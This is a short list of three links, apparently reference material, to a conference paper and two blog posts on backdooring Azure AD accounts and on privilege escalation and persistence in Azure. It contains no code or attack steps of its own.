- https://dirkjanm.io/assets/raw/US-22-Mollema-Backdooring-and-hijacking-Azure-AD-accounts_final.pdf
- https://posts.specterops.io/azure-privilege-escalation-via-azure-api-permissions-abuse-74aee1006f48
- https://medium.com/specter-ops-posts/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f